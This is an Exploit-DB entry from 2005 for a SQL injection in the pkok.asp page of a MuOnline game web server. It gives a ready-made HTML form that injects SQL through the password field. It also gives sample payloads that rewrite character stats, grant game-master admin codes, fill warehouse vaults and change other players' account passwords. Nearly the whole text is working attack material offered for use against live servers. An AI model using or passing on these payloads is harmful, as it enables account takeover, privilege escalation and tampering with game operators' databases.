MuOnline Loopholes Web Server pkok.asp SQL Injection Exploit

ID EDB-ID:1252
Type exploitdb
Reporter nukedx
Modified 2005-10-15T00:00:00


MuOnline Loopholes Web Server (pkok.asp) SQL Injection Exploit. Webapps exploit for asp platform

Save this code as .htm and replace [SITE]/[SQLCODE] to your server address

Some SQL Examples:

-Changing character data-
update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';--

Classcodes arE:
0: Dark Wizard
1: Soul Master
16: Dark knight
17: Blade knight
32: Elf
33: Muse Elf
48: Magic Gladiator
64: Dark Lord

Ctlcode is admin level code:
1: Blocked
8: GM
16: GM LVL2

-Blasting Vault-
update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';--

ITEMCODE is which u can get from itemproject.exe u can find it on google ;)

-Changing Account Password-
update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--

<form action="http://[SITE]/pkok.asp" method="post">
<input type="hidden" name="username" value="notimportant">
<input type="hidden" name="userchr" value="letzinject">
<input name="pass" type="text" value="notimportant';[SQLCODE]">
<input type="submit" name="submit" value="Do IT!">

# [2005-10-15]